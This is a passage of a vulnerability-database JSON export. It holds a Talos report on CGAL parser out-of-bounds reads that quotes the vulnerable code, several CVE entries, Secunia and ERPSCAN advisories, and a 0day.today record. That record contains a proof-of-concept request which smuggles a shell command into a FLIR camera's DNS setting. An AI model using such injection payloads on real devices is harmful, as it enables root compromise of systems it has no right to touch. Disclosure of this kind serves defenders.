index;\n seh->twin() = SEdge_of[index];\n OK = OK && test_string(\",\");\n in >> index;\n seh->sprev() = SEdge_of[index];\n OK = OK && test_string(\",\");\n in >> index;\n seh->snext() = SEdge_of[index];\n OK = OK && test_string(\",\");\n in >> index;\n seh->source() = Edge_of[index]; // <- oob read here\n \n\n#### CVE-2020-28632 - Nef_S2/SNC_io_parser.h SNC_io_parser::read_sedge() seh->incident_sface() OOB read\n\nAn oob read vulnerability exists in Nef_S2/SNC_io_parser.h SNC_io_parser::read_sedge() seh->incident_sface():\n \n \n template <typename EW>\n template <typename K>\n bool SNC_io_parser<EW>::\n read_sedge(SHalfedge_handle seh) {\n \n bool OK = true;\n int index;\n #ifdef CGAL_NEF_NATURAL_COORDINATE_INPUT\n typename K::RT a,b,c,d;\n #endif\n \n in >> index;\n OK = OK && test_string(\"{\");\n \n in >> index;\n seh->twin() = SEdge_of[index];\n OK = OK && test_string(\",\");\n in >> index;\n seh->sprev() = SEdge_of[index];\n OK = OK && test_string(\",\");\n in >> index;\n seh->snext() = SEdge_of[index];\n OK = OK && test_string(\",\");\n in >> index;\n seh->source() = Edge_of[index];\n OK = OK && test_string(\",\");\n in >> index;\n seh->incident_sface() = SFace_of[index]; // <- oob read here\n \n\n#### CVE-2020-28633 - Nef_S2/SNC_io_parser.h SNC_io_parser::read_sedge() seh->prev() OOB read\n\nAn oob read vulnerability exists in Nef_S2/SNC_io_parser.h SNC_io_parser::read_sedge() seh->prev():\n \n \n template <typename EW>\n template <typename K>\n bool SNC_io_parser<EW>::\n read_sedge(SHalfedge_handle seh) {\n \n bool OK = true;\n int index;\n #ifdef CGAL_NEF_NATURAL_COORDINATE_INPUT\n typename K::RT a,b,c,d;\n #endif\n \n in >> index;\n OK = OK && test_string(\"{\");\n \n in >> index;\n seh->twin() = SEdge_of[index];\n OK = OK && test_string(\",\");\n in >> index;\n seh->sprev() = SEdge_of[index];\n OK = OK && test_string(\",\");\n in >> index;\n seh->snext() = SEdge_of[index];\n OK = OK && test_string(\",\");\n in >> index;\n seh->source() = Edge_of[index];\n OK = OK && test_string(\",\");\n in >> index;\n seh->incident_sface() = SFace_of[index];\n OK = OK && test_string(\",\");\n in >> index;\n seh->prev() = SEdge_of[index]; // <- oob read here\n \n\n#### CVE-2020-28634 - Nef_S2/SNC_io_parser.h SNC_io_parser::read_sedge() seh->next() OOB read\n\nAn oob read vulnerability exists in Nef_S2/SNC_io_parser.h SNC_io_parser::read_sedge() seh->next():\n \n \n template <typename EW>\n template <typename K>\n bool SNC_io_parser<EW>::\n read_sedge(SHalfedge_handle seh) {\n \n bool OK = true;\n int index;\n #ifdef CGAL_NEF_NATURAL_COORDINATE_INPUT\n typename K::RT a,b,c,d;\n #endif\n \n in >> index;\n OK = OK && test_string(\"{\");\n \n in >> index;\n seh->twin() = SEdge_of[index];\n OK = OK && test_string(\",\");\n in >> index;\n seh->sprev() = SEdge_of[index];\n OK = OK && test_string(\",\");\n in >> index;\n seh->snext() = SEdge_of[index];\n OK = OK && test_string(\",\");\n in >> index;\n seh->source() = Edge_of[index];\n OK = OK && test_string(\",\");\n in >> index;\n seh->incident_sface() = SFace_of[index];\n OK = OK && test_string(\",\");\n in >> index;\n seh->prev() = SEdge_of[index];\n OK = OK && test_string(\",\");\n in >> index;\n seh->next() = SEdge_of[index]; // <- oob read here\n \n\n#### CVE-2020-28635 - Nef_S2/SNC_io_parser.h SNC_io_parser::read_sedge() seh->facet() OOB read\n\nAn oob read vulnerability exists in Nef_S2/SNC_io_parser.h SNC_io_parser::read_sedge() seh->facet():\n \n \n template <typename EW>\n template <typename K>\n bool SNC_io_parser<EW>::\n read_sedge(SHalfedge_handle seh) {\n \n bool OK = true;\n int index;\n #ifdef CGAL_NEF_NATURAL_COORDINATE_INPUT\n typename K::RT a,b,c,d;\n #endif\n \n in >> index;\n OK = OK && test_string(\"{\");\n \n in >> index;\n seh->twin() = SEdge_of[index];\n OK = OK && test_string(\",\");\n in >> index;\n seh->sprev() = SEdge_of[index];\n OK = OK && test_string(\",\");\n in >> index;\n seh->snext() = SEdge_of[index];\n OK = OK && test_string(\",\");\n in >> index;\n seh->source() = Edge_of[index];\n OK = OK && test_string(\",\");\n in >> index;\n seh->incident_sface() = SFace_of[index];\n OK = OK && test_string(\",\");\n in >> index;\n seh->prev() = SEdge_of[index];\n OK = OK && test_string(\",\");\n in >> index;\n seh->next() = SEdge_of[index];\n OK = OK && test_string(\",\");\n in >> index;\n seh->facet() = Halffacet_of[index]; // <- oob read here\n \n\n#### CVE-2020-28636 - Nef_S2/SNC_io_parser.h SNC_io_parser::read_sloop() slh->twin() OOB read\n\nAn oob read vulnerability exists in Nef_S2/SNC_io_parser.h SNC_io_parser::read_sloop() slh->twin():\n \n \n template <typename EW>\n template <typename K>\n bool SNC_io_parser<EW>::\n read_sloop(SHalfloop_handle slh) {\n \n bool OK = true;\n int index;\n #ifdef CGAL_NEF_NATURAL_COORDINATE_INPUT\n typename K::RT a,b,c,d;\n #endif\n \n in >> index;\n OK = OK && test_string(\"{\");\n \n in >> index;\n slh->twin() = SLoop_of[index]; // <- oob read here\n \n\n#### CVE-2020-35628 - Nef_S2/SNC_io_parser.h SNC_io_parser::read_sloop() slh->incident_sface() OOB read\n\nAn oob read vulnerability exists in Nef_S2/SNC_io_parser.h SNC_io_parser::read_sloop() slh->incident_sface():\n \n \n template <typename EW>\n template <typename K>\n bool SNC_io_parser<EW>::\n read_sloop(SHalfloop_handle slh) {\n \n bool OK = true;\n int index;\n #ifdef CGAL_NEF_NATURAL_COORDINATE_INPUT\n typename K::RT a,b,c,d;\n #endif\n \n in >> index;\n OK = OK && test_string(\"{\");\n \n in >> index;\n slh->twin() = SLoop_of[index];\n OK = OK && test_string(\",\");\n in >> index;\n slh->incident_sface() = SFace_of[index]; // <- oob read here\n \n\n#### CVE-2020-35629 - Nef_S2/SNC_io_parser.h SNC_io_parser::read_sloop() slh->facet() OOB read\n\nAn oob read vulnerability exists in Nef_S2/SNC_io_parser.h SNC_io_parser::read_sloop() slh->facet():\n \n \n template <typename EW>\n template <typename K>\n bool SNC_io_parser<EW>::\n read_sloop(SHalfloop_handle slh) {\n \n bool OK = true;\n int index;\n #ifdef CGAL_NEF_NATURAL_COORDINATE_INPUT\n typename K::RT a,b,c,d;\n #endif\n \n in >> index;\n OK = OK && test_string(\"{\");\n \n in >> index;\n slh->twin() = SLoop_of[index];\n OK = OK && test_string(\",\");\n in >> index;\n slh->incident_sface() = SFace_of[index];\n OK = OK && test_string(\",\");\n in >> index;\n slh->facet() = Halffacet_of[index]; // <- oob read here\n \n\n#### CVE-2020-35630 - Nef_S2/SNC_io_parser.h SNC_io_parser::read_sface() sfh->center_vertex() OOB read\n\nAn oob read vulnerability exists in Nef_S2/SNC_io_parser.h SNC_io_parser::read_sface() sfh->center_vertex():\n \n \n template <typename EW>\n bool SNC_io_parser<EW>::\n read_sface(SFace_handle sfh) {\n \n bool OK = true;\n int index;\n char cc;\n \n in >> index;\n OK = OK && test_string(\"{\");\n \n in >> index;\n sfh->center_vertex() = Vertex_of[index]; // <- oob read here\n \n\n#### CVE-2020-35631 - Nef_S2/SNC_io_parser.h SNC_io_parser::read_sface() SD.link_as_face_cycle() OOB read\n\nAn oob read vulnerability exists in Nef_S2/SNC_io_parser.h SNC_io_parser::read_sface() SD.link_as_face_cycle():\n \n \n template <typename EW>\n bool SNC_io_parser<EW>::\n read_sface(SFace_handle sfh) {\n \n bool OK = true;\n int index;\n char cc;\n \n in >> index;\n OK = OK && test_string(\"{\");\n \n in >> index;\n sfh->center_vertex() = Vertex_of[index];\n OK = OK && test_string(\",\");\n \n in >> cc;\n while(isdigit(cc)) {\n in.putback(cc);\n in >> index;\n // sfh->boundary_entry_objects().push_back(SEdge_of[index]);\n SM_decorator SD(&*sfh->center_vertex());\n SD.link_as_face_cycle(SEdge_of[index],sfh); // <- oob read here\n in >> cc;\n }\n \n\n#### CVE-2020-35632 - Nef_S2/SNC_io_parser.h SNC_io_parser::read_sface() sfh->boundary_entry_objects Edge_of OOB read\n\nAn oob read vulnerability exists in Nef_S2/SNC_io_parser.h SNC_io_parser::read_sface() sfh->boundary_entry_objects Edge_of:\n \n \n template <typename EW>\n bool SNC_io_parser<EW>::\n read_sface(SFace_handle sfh) {\n \n bool OK = true;\n int index;\n char cc;\n \n in >> index;\n OK = OK && test_string(\"{\");\n \n in >> index;\n sfh->center_vertex() = Vertex_of[index];\n OK = OK && test_string(\",\");\n \n in >> cc;\n while(isdigit(cc)) {\n in.putback(cc);\n in >> index;\n // sfh->boundary_entry_objects().push_back(SEdge_of[index]);\n SM_decorator SD(&*sfh->center_vertex());\n SD.link_as_face_cycle(SEdge_of[index],sfh);\n in >> cc;\n }\n \n in >> cc;\n while(isdigit(cc)) {\n in.putback(cc);\n in >> index;\n sfh->boundary_entry_objects().push_back(make_object(Edge_of[index])); // <- oob read here\n this->sncp()->store_sm_boundary_item(Edge_of[index], --(sfh->sface_cycles_end()));\n in >> cc;\n }\n \n\n#### CVE-2020-35633 - Nef_S2/SNC_io_parser.h SNC_io_parser::read_sface() store_sm_boundary_item() Edge_of OOB read\n\nAn oob read vulnerability exists in Nef_S2/SNC_io_parser.h SNC_io_parser::read_sface() store_sm_boundary_item() Edge_of:\n \n \n template <typename EW>\n bool SNC_io_parser<EW>::\n read_sface(SFace_handle sfh) {\n \n bool OK = true;\n int index;\n char cc;\n \n in >> index;\n OK = OK && test_string(\"{\");\n \n in >> index;\n sfh->center_vertex() = Vertex_of[index];\n OK = OK && test_string(\",\");\n \n in >> cc;\n while(isdigit(cc)) {\n in.putback(cc);\n in >> index;\n // sfh->boundary_entry_objects().push_back(SEdge_of[index]);\n SM_decorator SD(&*sfh->center_vertex());\n SD.link_as_face_cycle(SEdge_of[index],sfh);\n in >> cc;\n }\n \n in >> cc;\n while(isdigit(cc)) {\n in.putback(cc);\n in >> index;\n sfh->boundary_entry_objects().push_back(make_object(Edge_of[index])); \n this->sncp()->store_sm_boundary_item(Edge_of[index], --(sfh->sface_cycles_end())); // <- oob read here\n in >> cc;\n }\n \n\n#### CVE-2020-35634 - Nef_S2/SNC_io_parser.h SNC_io_parser::read_sface() sfh->boundary_entry_objects Sloop_of OOB read\n\nAn oob read vulnerability exists in Nef_S2/SNC_io_parser.h SNC_io_parser::read_sface() sfh->boundary_entry_objects Sloop_of:\n \n \n template <typename EW>\n bool SNC_io_parser<EW>::\n read_sface(SFace_handle sfh) {\n \n bool OK = true;\n int index;\n char cc;\n \n in >> index;\n OK = OK && test_string(\"{\");\n \n in >> index;\n sfh->center_vertex() = Vertex_of[index];\n OK = OK && test_string(\",\");\n \n in >> cc;\n while(isdigit(cc)) {\n in.putback(cc);\n in >> index;\n // sfh->boundary_entry_objects().push_back(SEdge_of[index]);\n SM_decorator SD(&*sfh->center_vertex());\n SD.link_as_face_cycle(SEdge_of[index],sfh);\n in >> cc;\n }\n \n in >> cc;\n while(isdigit(cc)) {\n in.putback(cc);\n in >> index;\n sfh->boundary_entry_objects().push_back(make_object(Edge_of[index]));\n this->sncp()->store_sm_boundary_item(Edge_of[index], --(sfh->sface_cycles_end()));\n in >> cc;\n }\n \n in >> cc;\n while(isdigit(cc)) {\n in.putback(cc);\n in >> index;\n sfh->boundary_entry_objects().push_back(make_object(SLoop_of[index])); // <- oob read here\n \n\n#### CVE-2020-35635 - Nef_S2/SNC_io_parser.h SNC_io_parser::read_sface() store_sm_boundary_item() Sloop_of OOB read\n\nAn oob read vulnerability exists in Nef_S2/SNC_io_parser.h SNC_io_parser::read_sface() store_sm_boundary_item() Sloop_of:\n \n \n template <typename EW>\n bool SNC_io_parser<EW>::\n read_sface(SFace_handle sfh) {\n \n bool OK = true;\n int index;\n char cc;\n \n in >> index;\n OK = OK && test_string(\"{\");\n \n in >> index;\n sfh->center_vertex() = Vertex_of[index];\n OK = OK && test_string(\",\");\n \n in >> cc;\n while(isdigit(cc)) {\n in.putback(cc);\n in >> index;\n // sfh->boundary_entry_objects().push_back(SEdge_of[index]);\n SM_decorator SD(&*sfh->center_vertex());\n SD.link_as_face_cycle(SEdge_of[index],sfh);\n in >> cc;\n }\n \n in >> cc;\n while(isdigit(cc)) {\n in.putback(cc);\n in >> index;\n sfh->boundary_entry_objects().push_back(make_object(Edge_of[index]));\n this->sncp()->store_sm_boundary_item(Edge_of[index], --(sfh->sface_cycles_end()));\n in >> cc;\n }\n \n in >> cc;\n while(isdigit(cc)) {\n in.putback(cc);\n in >> index;\n sfh->boundary_entry_objects().push_back(make_object(SLoop_of[index]));\n this->sncp()->store_sm_boundary_item(SLoop_of[index], --(sfh->sface_cycles_end())); // <- oob read here\n \n\n#### CVE-2020-35636 - Nef_S2/SNC_io_parser.h SNC_io_parser::read_sface() sfh->volume() OOB read\n\nAn oob read vulnerability exists in Nef_S2/SNC_io_parser.h SNC_io_parser::read_sface() sfh->volume():\n \n \n template <typename EW>\n bool SNC_io_parser<EW>::\n read_sface(SFace_handle sfh) {\n \n bool OK = true;\n int index;\n char cc;\n \n in >> index;\n OK = OK && test_string(\"{\");\n \n in >> index;\n sfh->center_vertex() = Vertex_of[index];\n OK = OK && test_string(\",\");\n \n in >> cc;\n while(isdigit(cc)) {\n in.putback(cc);\n in >> index;\n // sfh->boundary_entry_objects().push_back(SEdge_of[index]);\n SM_decorator SD(&*sfh->center_vertex());\n SD.link_as_face_cycle(SEdge_of[index],sfh);\n in >> cc;\n }\n \n in >> cc;\n while(isdigit(cc)) {\n in.putback(cc);\n in >> index;\n sfh->boundary_entry_objects().push_back(make_object(Edge_of[index]));\n this->sncp()->store_sm_boundary_item(Edge_of[index], --(sfh->sface_cycles_end()));\n in >> cc;\n }\n \n in >> cc;\n while(isdigit(cc)) {\n in.putback(cc);\n in >> index;\n sfh->boundary_entry_objects().push_back(make_object(SLoop_of[index]));\n this->sncp()->store_sm_boundary_item(SLoop_of[index], --(sfh->sface_cycles_end()));\n in >> cc;\n }\n \n in >> index;\n sfh->volume() = Volume_of[index+addInfiBox]; // <- oob read here \n \n\n### Timeline\n\n2021-01-12 - Vendor Disclosure \n2021-02-23 - Vendor Patched \n2021-02-24 - Public Release\n\n##### Credit\n\nDiscovered by Lilith >_> of Cisco Talos.\n\n* * *\n\nVulnerability Reports Next Report\n\nTALOS-2021-1248\n\nPrevious Report\n\nTALOS-2020-1213\n", "edition": 1, "modified": "2021-02-24T00:00:00", "published": "2021-02-24T00:00:00", "id": "TALOS-2020-1225", "href": "http://www.talosintelligence.com/vulnerability_reports/TALOS-2020-1225", "title": "CGAL libcgal multiple code execution vulnerabilities in Nef polygon-parsing code", "type": "talos", "cvss": {"score": 0.0, "vector": "NONE"}}], "cve": [{"lastseen": "2021-02-02T06:14:28", "description": "Barracuda Web Application Firewall (WAF) 7.8.1.013 allows remote attackers to bypass authentication by leveraging a permanent authentication token obtained from a query string.", "edition": 7, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-02-12T01:15:00", "title": "CVE-2014-2595", "type": "cve", "cwe": ["CWE-613"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-2595"], "modified": "2020-02-20T15:55:00", "cpe": ["cpe:/a:barracuda:web_application_firewall:7.8.1.013"], "id": "CVE-2014-2595", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-2595", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:barracuda:web_application_firewall:7.8.1.013:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T05:35:21", "description": "A symlink issue exists in Iceweasel-firegpg before 0.6 due to insecure tempfile handling.", "edition": 8, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2019-11-18T22:15:00", "title": "CVE-2008-7273", "type": "cve", "cwe": ["CWE-59"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-7273"], "modified": "2019-11-20T15:56:00", "cpe": [], "id": "CVE-2008-7273", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-7273", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": []}, {"lastseen": "2021-02-02T05:35:21", "description": "FireGPG before 0.6 handle user\u2019s passphrase and decrypted cleartext insecurely by writing pre-encrypted cleartext and the user's passphrase to disk which may result in the compromise of secure communication or a users\u2019s private key.", "edition": 8, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2019-11-08T00:15:00", "title": "CVE-2008-7272", "type": "cve", "cwe": ["CWE-312"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-7272"], "modified": "2020-02-10T21:16:00", "cpe": [], "id": "CVE-2008-7272", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-7272", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": []}, {"lastseen": "2021-02-02T06:21:32", "description": "Controllers.outgoing in controllers/index.js in NodeBB before 0.7.3 has outgoing XSS.", "edition": 6, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "baseScore": 6.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 2.7}, "published": "2019-04-30T14:29:00", "title": "CVE-2015-9286", "type": "cve", "cwe": ["CWE-79"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-9286"], "modified": "2019-05-01T14:22:00", "cpe": [], "id": "CVE-2015-9286", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-9286", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": []}], "zdt": [{"lastseen": "2018-03-02T01:42:03", "description": "FLIR FC-S/PT series suffer from an authenticated OS command injection vulnerability. This can be exploited to inject and execute arbitrary shell commands as the root user.", "edition": 1, "published": "2017-09-26T00:00:00", "title": "FLIR Systems FLIR Thermal Camera FC-S/PT Authenticated OS Command Injection Vulnerability", "type": "zdt", "bulletinFamily": "exploit", "cvelist": [], "modified": "2017-09-26T00:00:00", "href": "https://0day.today/exploit/description/28631", "id": "1337DAY-ID-28631", "sourceData": "FLIR Systems FLIR Thermal Camera FC-S/PT Authenticated OS Command Injection\r\n\r\n\r\nVendor: FLIR Systems, Inc.\r\nProduct web page: http://www.flir.com\r\nAffected version: Firmware version: 8.0.0.64\r\n Software version: 10.0.2.43\r\n Release: 1.4.1, 1.4, 1.3.4 GA, 1.3.3 GA and 1.3.2\r\n FC-Series S (FC-334-NTSC)\r\n PT-Series (PT-334 200562)\r\n\r\nSummary: Get the best image detail in challenging imaging environments with the\r\nFLIR FC-Series S thermal network camera. The award-winning FC-Series S camera\r\nsets the industry standard for high-quality thermal security cameras, ideal for\r\nperimeter protection applications. The FC-Series S is capable of replacing multiple\r\nvisible cameras and any additional lighting and infrastructure needed to support\r\nthem.\r\n\r\nDesc: FLIR FC-S/PT series suffer from an authenticated OS command injection vulnerability.\r\nThis can be exploited to inject and execute arbitrary shell commands as the root user.\r\n\r\n\r\nTested on: Linux 2.6.18_pro500-davinci_evm-arm_v5t_le\r\n Linux 2.6.10_mvl401-davinci_evm-PSP_01_30_00_082\r\n Nexus Server/2.5.29.0\r\n Nexus Server/2.5.14.0\r\n Nexus Server/2.5.13.0\r\n lighttpd/1.4.28\r\n PHP/5.4.7\r\n\r\n\r\nVulnerability discovered by Gjoko 'LiquidWorm' Krstic\r\n @zeroscience\r\n\r\n\r\nAdvisory ID: ZSL-2017-5437\r\nAdvisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5437.php\r\n\r\n\r\n23.03.2017\r\n\r\n--\r\n\r\n\r\nPoC request (sleep 17):\r\n\r\nPOST /page/maintenance/lanSettings/dns HTTP/1.1\r\nHost: TARGET\r\nContent-Length: 64\r\nAccept: */*\r\nOrigin: http://TARGET\r\nX-Requested-With: XMLHttpRequest\r\nUser-Agent: Testingus/1.0\r\nContent-Type: application/x-www-form-urlencoded\r\nReferer: http://TARGET/maintenance\r\nAccept-Language: en-US,en;q=0.8,mk;q=0.6\r\nCookie: PHPSESSID=d1eabfdb8db4b95f92c12b8402abc03b\r\nConnection: close\r\n\r\ndns%5Bserver1%5D=8.8.8.8&dns%5Bserver2%5D=8.8.4.4%60sleep%2017%60\n\n# 0day.today [2018-03-01] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/28631"}], "securityvulns": [{"lastseen": "2018-08-31T11:11:02", "bulletinFamily": "software", "cvelist": ["CVE-2015-4878", "CVE-2015-4877"], "description": "\r\n\r\n======================================================================\r\n\r\n Secunia Research (now part of Flexera Software) 26/10/2015\r\n\r\n Oracle Outside In Two Buffer Overflow Vulnerabilities\r\n\r\n======================================================================\r\nTable of Contents\r\n\r\nAffected Software....................................................1\r\nSeverity.............................................................2\r\nDescription of Vulnerabilities.......................................3\r\nSolution.............................................................4\r\nTime Table...........................................................5\r\nCredits..............................................................6\r\nReferences...........................................................7\r\nAbout Secunia........................................................8\r\nVerification.........................................................9\r\n\r\n======================================================================\r\n\r\n1) Affected Software\r\n\r\n* Oracle Outside In versions 8.5.0, 8.5.1, and 8.5.2.\r\n\r\n====================================================================== \r\n2) Severity\r\n\r\nRating: Moderately critical\r\nImpact: System Access\r\nWhere: From remote\r\n\r\n====================================================================== \r\n3) Description of Vulnerabilities\r\n\r\nSecunia Research has discovered two vulnerabilities in Oracle Outside\r\nIn Technology, which can be exploited by malicious people to cause a\r\nDoS (Denial of Service) and compromise an application using the SDK.\r\n\r\n1) An error in the vstga.dll when processing TGA files can be\r\nexploited to cause an out-of-bounds write memory access.\r\n\r\n2) An error in the libxwd2.dll when processing XWD files can be\r\nexploited to cause a stack-based buffer overflow.\r\n\r\nSuccessful exploitation of the vulnerabilities may allow execution of\r\narbitrary code.\r\n\r\n====================================================================== \r\n4) Solution\r\n\r\nApply update. Please see the Oracle Critical Patch Update Advisory\r\nfor October 2015 for details.\r\n\r\n====================================================================== \r\n5) Time Table\r\n\r\n14/07/2015 - Vendor notified of vulnerabilities.\r\n14/07/2015 - Vendor acknowledges report.\r\n16/07/2015 - Vendor supplied bug ticket ID.\r\n27/07/2015 - Vendor supplied information of fix in main codeline.\r\n24/09/2015 - Replied to vendor and asked about CVE references.\r\n25/09/2015 - Vendor replied that they check our request.\r\n27/09/2015 - Vendor assigned two CVE references.\r\n17/10/2015 - Vendor supplied 20/10/2015 as estimated fix date.\r\n20/10/2015 - Release of vendor patch.\r\n21/10/2015 - Public disclosure.\r\n26/10/2015 - Publication of research advisory.\r\n\r\n======================================================================\r\n\r\n6) Credits\r\n\r\nDiscovered by Behzad Najjarpour Jabbari, Secunia Research (now part\r\nof Flexera Software).\r\n\r\n======================================================================\r\n\r\n7) References\r\n\r\nThe Common Vulnerabilities and Exposures (CVE) project has assigned\r\nthe CVE-2015-4877 and CVE-2015-4878 identifiers for the\r\nvulnerabilities.\r\n\r\n======================================================================\r\n\r\n8) About Secunia (now part of Flexera Software)\r\n\r\nIn September 2015, Secunia has been acquired by Flexera Software:\r\n\r\nhttps://secunia.com/blog/435/\r\n\r\nSecunia offers vulnerability management solutions to corporate\r\ncustomers with verified and reliable vulnerability intelligence\r\nrelevant to their specific system configuration:\r\n\r\nhttp://secunia.com/advisories/business_solutions/\r\n\r\nSecunia also provides a publicly accessible and comprehensive advisory\r\ndatabase as a service to the security community and private\r\nindividuals, who are interested in or concerned about IT-security.\r\n\r\nhttp://secunia.com/advisories/\r\n\r\nSecunia believes that it is important to support the community and to\r\ndo active vulnerability research in order to aid improving the\r\nsecurity and reliability of software in general:\r\n\r\nhttp://secunia.com/secunia_research/\r\n\r\nSecunia regularly hires new skilled team members. Check the URL below\r\nto see currently vacant positions:\r\n\r\nhttp://secunia.com/corporate/jobs/\r\n\r\nSecunia offers a FREE mailing list called Secunia Security Advisories:\r\n\r\nhttp://secunia.com/advisories/mailing_lists/\r\n\r\n======================================================================\r\n\r\n9) Verification \r\n\r\nPlease verify this advisory by visiting the Secunia website:\r\nhttp://secunia.com/secunia_research/2015-04/\r\n\r\nComplete list of vulnerability reports published by Secunia Research:\r\nhttp://secunia.com/secunia_research/\r\n\r\n======================================================================\r\n\r\n", "edition": 1, "modified": "2015-11-02T00:00:00", "published": "2015-11-02T00:00:00", "id": "SECURITYVULNS:DOC:32659", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32659", "title": "Secunia Research: Oracle Outside In Two Buffer Overflow Vulnerabilities", "type": "securityvulns", "cvss": {"score": 1.5, "vector": "AV:LOCAL/AC:MEDIUM/Au:SINGLE_INSTANCE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:11:02", "bulletinFamily": "software", "cvelist": ["CVE-2015-4845"], "description": "\r\n\r\n1. ADVISORY INFORMATION\r\n\r\nTitle: Oracle E-Business Suite - Database user enumeration\r\nAdvisory ID: [ERPSCAN-15-025]\r\nAdvisory URL: http://erpscan.com/advisories/erpscan-15-025-oracle-e-business-suite-database-user-enumeration-vulnerability/\r\nDate published:20.10.2015\r\nVendors contacted: Oracle\r\n\r\n2. VULNERABILITY INFORMATION\r\n\r\nClass: User Enumeration\r\nImpact: user enumeration, SSRF\r\nRemotely Exploitable: Yes\r\nLocally Exploitable: No\r\nCVE Name: CVE-2015-4845\r\nCVSS Information\r\nCVSS Base Score: 4.3 / 10\r\nAV : Access Vector (Related exploit range) Network (N)\r\nAC : Access Complexity (Required attack complexity) Medium (M)\r\nAu : Authentication (Level of authentication needed to exploit) None (N)\r\nC : Impact to Confidentiality Partial (P)\r\nI : Impact to Integrity None (N)\r\nA : Impact to Availability None (N)\r\n\r\n3. VULNERABILITY DESCRIPTION\r\n\r\nThere is a script in EBS that is used to connect to the database and\r\ndisplays the connection status. Different connection results can help\r\nan attacker to find existing database accounts.\r\n\r\n4. VULNERABLE PACKAGES\r\n\r\nOracle E-Business Suite 12.2.4\r\nOther versions are probably affected too, but they were not checked.\r\n\r\n5. SOLUTIONS AND WORKAROUNDS\r\n\r\nInstall Oracle 